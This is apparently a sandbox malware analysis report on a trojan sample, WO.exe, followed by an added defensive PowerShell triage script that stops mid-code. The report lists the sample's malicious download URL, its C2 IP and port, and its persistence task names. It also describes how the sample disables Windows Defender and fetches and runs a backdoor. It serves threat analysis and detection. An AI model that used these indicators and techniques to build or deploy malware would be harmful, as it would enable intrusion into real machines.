                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (5 consecutive identical queries)
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (2 consecutive identical queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation (3 consecutive identical queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (3 consecutive identical queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (5 consecutive identical queries)

Lowering of HIPS / PFW / Operating System Security Settings

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRealtimeMonitoring = 1

Remote Access Functionality

Source: Yara match | File source: 53.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 53.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\reddit.exe, type: DROPPED
Source: Yara match | File source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
MITRE ATT&CK Matrix

The matrix is rebuilt here one tactic column per line. A number in parentheses is the signature count the report shows for a highlighted technique; entries without a number are the unhighlighted matrix cells (no signature hit for this sample).

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses
Resource Development: Scripting (11) | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise
Execution: Native API (1) | Command and Scripting Interpreter (1) | Scheduled Task/Job (1) | Service Execution (11) | PowerShell (2) | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell
Persistence: Scripting (11) | DLL Side-Loading (1) | Windows Service (11) | Scheduled Task/Job (1) | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
Privilege Escalation: DLL Side-Loading (1) | Bypass User Account Control (1) | Windows Service (11) | Process Injection (11) | Scheduled Task/Job (1) | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
Defense Evasion: Disable or Modify Tools (3) | Deobfuscate/Decode Files or Information (1) | Obfuscated Files or Information (4) | Software Packing (2) | DLL Side-Loading (1) | Bypass User Account Control (1) | Masquerading (1) | Modify Registry (1) | Virtualization/Sandbox Evasion (21) | Process Injection (11)
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing
Discovery: File and Directory Discovery (2) | System Information Discovery (11) | Security Software Discovery (21) | Process Discovery (1) | Virtualization/Sandbox Evasion (21) | Application Window Discovery (1) | Remote System Discovery | System Owner/User Discovery | Network Sniffing | Network Service Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot
Collection: Archive Collected Data (1) | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging
Command and Control: Ingress Tool Transfer (2) | Encrypted Channel (11) | Non-Standard Port (1) | Non-Application Layer Protocol (2) | Application Layer Protocol (3) | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement
Behavior Graph

Behavior Graph ID: 1580052 | Sample: WO.exe | Start date: 23/12/2024 | Architecture: WINDOWS | Score: 100
DNS: f.neko.pe
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 10 other signatures

Process tree (graph node numbers in parentheses; "..." in paths is as shown in the graph):

• WO.exe (9): dropped C:\Users\user\AppData\Local\Temp\...\4784.bat (ASCII); started cmd.exe (19)
• WO.exe (12): dropped C:\Users\user\AppData\Local\Temp\...\6F7F.bat (ASCII); signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; started cmd.exe (23)
• WO.exe (15): dropped C:\Users\user\AppData\Local\Temp\...\703A.bat (ASCII); started cmd.exe (25)
• WO.exe (17): dropped C:\Users\user\AppData\Local\Temp\...\481C.bat (ASCII); started cmd.exe (27)
• cmd.exe (19): dropped C:\Users\user\AppData\Roaming\...\WO.exe (PE32+) and C:\Users\user\...\WO.exe:Zone.Identifier (ASCII); signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Tries to download and execute files (via powershell); Uses schtasks.exe or at.exe to add and modify task schedules; started reddit.exe (29), powershell.exe (33), powershell.exe (35) and 10 other processes (42)
• cmd.exe (23): signatures: Modifies Windows Defender protection settings; Disables Windows Defender (via service or powershell); started powershell.exe (38) and 10 other processes (44)
• cmd.exe (25): started powershell.exe (40) and 10 other processes (46)
• cmd.exe (27): started 7 other processes (48)
• reddit.exe (29): connects to 147.185.221.23 port 1121 (local ports 49731, 49732; SALSGIVERUS, United States); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
• powershell.exe (33): signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
• powershell.exe (35): connects to f.neko.pe (185.151.51.214) port 443 (local port 49730; A2HOSTINGUS, United States); dropped C:\Users\user\AppData\Local\Temp\reddit.exe (PE32)
• 10 other processes (42): signature: Disable Windows Defender real time protection (registry); started net1.exe (50)
• 10 other processes (44): started net1.exe (52)
• 10 other processes (46): started net1.exe (54)

Antivirus, Machine Learning and Genetic Malware Detection

Submitted sample
Source | Detection | Scanner | Label
WO.exe | 58% | ReversingLabs | Win64.Trojan.Boxter
WO.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\reddit.exe | 100% | Avira | TR/Patched.Gen2
C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\reddit.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\reddit.exe | 89% | ReversingLabs | Win32.Backdoor.Swrort
C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | 58% | ReversingLabs | Win64.Trojan.Boxter

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://f.neko.pe/file/~d35Ci~adCQqRGW | 0% | Avira URL Cloud | safe
https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe | 100% | Avira URL Cloud | malware
http://www.zeustech.net/ | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
f.neko.pe | 185.151.51.214 | true | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | reddit.exe, 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001B.00000000.1807381222.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001C.00000002.2895738528.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 00000035.00000000.2341086873.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe.5.dr | false | | high
https://f.neko.pe/file/~d35Ci~adCQqRGW | WO.exe | true | Avira URL Cloud: safe | unknown
http://www.apache.org/ | reddit.exe.5.dr | false | | high
http://www.zeustech.net/ | reddit.exe.5.dr | false | Avira URL Cloud: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.151.51.214 | f.neko.pe | United States | 55293 | A2HOSTINGUS | true
147.185.221.23 | unknown | United States | 12087 | SALSGIVERUS | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580052
Start date and time: 2024-12-23 19:53:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 57
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WO.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@102/44@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 110
• Number of non-executed functions: 126
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: WO.exe
Time | Type | Description
13:53:56 | API Interceptor | 112x Sleep call for process: powershell.exe modified
18:54:05 | Task Scheduler | Run new task: RunRedditLogon, path: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
18:54:05 | Task Scheduler | Run new task: RunRedditMinute, path: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
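The report ties three host artefacts to this sample: the DisableRealtimeMonitoring policy value created under the Windows Defender Real-Time Protection key (see "Lowering of HIPS / PFW / Operating System Security Settings"), the two scheduled tasks above that launch the dropped copy at C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe, and the reddit.exe connection to 147.185.221.23 on port 1121. The PowerShell below is an added triage example written for this page, not code from the report or from Joe Sandbox; it checks a live host for those three indicators. The registry key and value name, task names, file path, IP and port are taken from the report; the function names, the `*\HiddenScripts\*` action wildcard and the decision to report each indicator separately are my own choices. It assumes a Windows host with the ScheduledTasks and NetTCPIP modules (Windows 8 / Server 2012 or later) and read access to the HKLM policy hive.

```powershell
# Added host-triage example for the artefacts in this report (not Joe Sandbox code).
# Indicator values below come from the report; names/wildcards are the author's assumptions.

$DefenderPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'
$PersistencePath   = Join-Path $env:APPDATA 'HiddenScripts\WO.exe'
$TaskNames         = @('RunRedditLogon', 'RunRedditMinute')
$C2Address         = '147.185.221.23'
$C2Port            = 1121

function Test-DefenderRealtimeTampered {
    # The report records DisableRealtimeMonitoring = 1 being created under the *policy*
    # key. That value is absent on a default install; when present and set to 1 it
    # overrides the user-facing real-time protection toggle.
    $item = Get-ItemProperty -Path $DefenderPolicyKey -ErrorAction SilentlyContinue
    return ($null -ne $item -and $item.DisableRealtimeMonitoring -eq 1)
}

function Get-SuspiciousScheduledTasks {
    # Match the two task names from the report, and also any task whose action path
    # points into %APPDATA%\HiddenScripts (assumed wildcard, catches renamed tasks).
    Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object {
        $task = $_
        ($task.TaskName -in $TaskNames) -or
        [bool]($task.Actions | Where-Object { $_.Execute -like '*\HiddenScripts\*' })
    }
}

function Test-C2Connection {
    # reddit.exe reached 147.185.221.23:1121 in the sandbox run; check for a live socket.
    $conn = Get-NetTCPConnection -RemoteAddress $C2Address -RemotePort $C2Port `
                                 -ErrorAction SilentlyContinue
    return ($null -ne $conn)
}

function Invoke-WOTriage {
    # One object with each indicator kept separate, so an analyst can weigh them
    # (the policy value alone can be set legitimately by Group Policy).
    [pscustomobject]@{
        DefenderRealtimeDisabledByPolicy = Test-DefenderRealtimeTampered
        PersistenceBinaryPresent         = Test-Path -Path $PersistencePath
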